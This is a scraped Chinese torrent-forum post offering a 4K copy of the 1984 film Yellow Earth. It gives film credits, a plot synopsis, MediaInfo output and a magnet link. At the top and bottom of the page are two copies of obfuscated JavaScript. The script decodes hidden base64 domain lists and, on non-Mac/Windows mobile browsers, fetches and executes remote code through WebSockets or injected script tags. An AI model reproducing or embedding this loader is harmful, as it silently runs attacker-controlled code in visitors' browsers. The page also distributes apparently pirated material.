黄土地[国语配音].Yellow.Earth.1984.2160p.WEB-DL.H265.AAC 2.99GB

版主小s 21天前 162

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 黄土地 / 深谷回声 / Yellow Earth

◎年 代 1984

◎产 地 中国大陆

◎类 别 剧情 / 音乐

◎语 言 汉语普通话 / 陕西方言

◎上映日期 1984(中国大陆) / 1985-08-10(洛迦诺电影节) / 1985-09-10(多伦多电影节)

◎IMDb链接 https://www.imdb.com/title/tt0087433/

◎豆瓣评分 7.9/10 (28373人评价)

◎豆瓣链接 https://movie.douban.com/subject/1291876/

◎片 长 89分钟(德国)

◎导 演 陈凯歌 Kaige Chen (id:1023040)

◎编 剧 张子良 Ziliang Zhang (id:1340089)

柯蓝 Lan Ke (id:1373929)

陈凯歌 Kaige Chen (id:1023040)

◎演 员 薛白 Bai Xue (id:1275918)

王学圻 Xueqi Wang (id:1054562)

谭托 Tuo Tan (id:1373931)

刘强 Qiang Liu (id:1373930)

赵季平 Jiping Zhao (id:1274974)

张艺谋 Yimou Zhang (id:1054398)

何群 Qun He (id:1319812)

◎标 签 陈凯歌 / 张艺谋 / 中国电影 / 黄土地 / 中国 / 大陆 / 1985 / 中国大陆

◎简 介

陕北黄土高原上的贫苦女孩翠巧(薛白饰),自小由父亲(谭托饰)作主定下娃娃亲。八路军文工团团员顾青(王学圻饰),为采集民歌来到翠巧家,一段时间后,与翠巧家彼此仿佛自家人般。顾青讲述起延安妇女婚姻自主的情况,翠巧听后,心生向往。

父亲虽善良,可又愚昧,他要翠巧在四月里完婚。顾青行将离去,翠巧要随去延安,顾青有心无力。翠巧弟弟憨憨(刘强饰)跟着顾大哥,送了一程又一程。翻过一座山梁,顾青看见翠巧站在峰顶上,她用甜美歌喉唱歌送别,顾青深受感动。

四月,翠巧在完婚之日,心有不甘决然逃出夫家,划船渡河去追求新的生活……

◎获奖情况 (共1项)

第5届中国电影金鸡奖 (1985)

最佳摄影

└──张艺谋 (id:1054398)

  1. ##### MediaInfo ######

  2. General

  3. Complete name : 黄土地[email protected]

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom/iso2/mp41)

  7. File size : 2.99 GiB

  8. Duration : 1 h 26 min

  9. Overall bit rate : 4 954 kb/s

  10. Writing application : Lavf58.17.103


  11. Video

  12. ID : 1

  13. Format : HEVC

  14. Format/Info : High Efficiency Video Coding

  15. Format profile : [email protected]@Main

  16. Codec ID : hev1

  17. Codec ID/Info : High Efficiency Video Coding

  18. Duration : 1 h 26 min

  19. Bit rate : 4 758 kb/s

  20. Width : 3 736 pixels

  21. Height : 2 160 pixels

  22. Display aspect ratio : 1.730

  23. Frame rate mode : Constant

  24. Frame rate : 25.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.024

  29. Stream size : 2.87 GiB (96%)

  30. Codec configuration box : hvcC


  31. Audio

  32. ID : 2

  33. Format : AAC LC

  34. Format/Info : Advanced Audio Codec Low Complexity

  35. Codec ID : mp4a-40-2

  36. Duration : 1 h 26 min

  37. Bit rate mode : Constant

  38. Bit rate : 192 kb/s

  39. Channel(s) : 2 channels

  40. Channel layout : L R

  41. Sampling rate : 44.1 kHz

  42. Frame rate : 43.066 FPS (1024 SPF)

  43. Compression mode : Lossy

  44. Stream size : 117 MiB (4%)

  45. Default : Yes

  46. Alternate group : 1




复制代码


TAGS 剧情 音乐

磁力链:
  • magnet:?xt=urn:btih:FFE44E2248870869408261EB737DAADEC7EDAB28

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};